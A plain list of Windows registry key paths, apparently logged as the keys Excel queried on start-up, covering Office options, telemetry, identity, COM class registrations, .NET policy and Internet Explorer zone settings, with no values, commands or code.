HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToIEAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\outexum\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\outexum
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\outexum\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Access_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Access_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Access_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Word_Core
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Word_Core\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\Word_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Word_Intl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Word_Intl\Count
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertForLargeOperations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LargeOperationCellCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options95
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\BinaryOptions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DDECleaned
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RecognizeSmartTags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefSheets
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertIfNotDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoDec
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MenuKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtX
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtY
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoChartFontScaling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CustomSortOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MoveEnterDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FlashFill
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ExtendList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableFourDigitYearDisplay
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CfDDELink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NoWideTextRendering
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverDelay
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableNetworkResiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoHyperlink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoExpandListRange
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoCreateCalcCol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Error Checking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublish
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublishWarning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Xl9_Hijri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Jasper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Detroit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\WarnFuncConflict
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LivePreview
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SuppressDisplayAlerts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableParenFlash
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IME
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531FDEBF-9B4C-4A43-A2AA-960E8FCDC732}\LanguageProfile\0x00000404\{0B883BA0-C1C7-11D4-87F9-0080C882687E}\Enable
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{AE6BE008-07FB-400D-8BEB-337A64F7051F}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\LanguageProfile
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}\LanguageProfile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\UseOfficeUIFont
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\AirspaceDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseOnlineContent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableADALExtendedApps
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableADAL
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityCRL
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SignIn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\NoDomainUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationSignInName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationConfigError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Identities
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\GELPrefs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Profiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\UserSegmentData\1:en-US:Office_FloodGate
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\InstallRoot
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Upgrades
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\Upgrades
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\AutomationSecurity
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\CurrentProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWordsJapan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseOnline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\PreferOffline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Logging
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesRetrievalTimeCap
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\Debug
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EdgeRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\FlightNumberlines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\OldAriaDllDetected
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\ClientSamplingOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TransportNetworkBackoff
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\AggregatorTimeCap
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\UseBondSerializer
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TelemetryFileSizeLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\AggregatorAgeLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\AggregatorSizeLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteTelemetryEventsToAria
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ServerReachabilityTimeout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableServerReachability
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\ProviderId
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\NetworkStatusCache\config.edge.skype.com
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FeatureControl
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\TreatAs
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\MaximumAllowedAllocationSize
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_Classes
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LastUILang
HKEY_CURRENT_USER\Software\Microsoft\Shared
HKEY_CURRENT_USER\Software\Microsoft\Shared\OfficeUILanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Excel\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\UseAlternateOutlookAppUserModelId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetrySent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbControl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbOn
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbSysIcon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbTips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AcbST
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ONetConfig
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\NetworkStatusCache\officeclient.microsoft.com
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\ActivityAggregationInterval
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CURRENT_USER\Software\Microsoft\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}\InsecureQI
HKEY_CURRENT_USER\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A47979D2-C419-11D9-A5B4-001185AD2B89}\AppID
HKEY_CURRENT_USER\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{C96887DA-A652-4426-905E-4A37546F847C}\DllSurrogate
HKEY_CURRENT_USER\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{22D2E146-1A68-40B8-949C-8FD848B415E6}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{22D2E146-1A68-40B8-949C-8FD848B415E6}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{22D2E146-1A68-40B8-949C-8FD848B415E6}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2ABC0864-9677-42E5-882A-D415C556C284}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2ABC0864-9677-42E5-882A-D415C556C284}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2ABC0864-9677-42E5-882A-D415C556C284}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Deprecated
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\Themes\1033\NextUpdate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\NotificationsNeverShowAgainLanguages
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableBackgrounds
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\OSM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\OSM
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\OSM
HKEY_LOCAL_MACHINE\ZoneMap\Ranges\
HKEY_CURRENT_USER\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Met
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PendingUITheme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UI Theme
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SendCustomerData
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\Licensing
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Licensing
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusRulesEndpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\NexusV3Endpoint
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
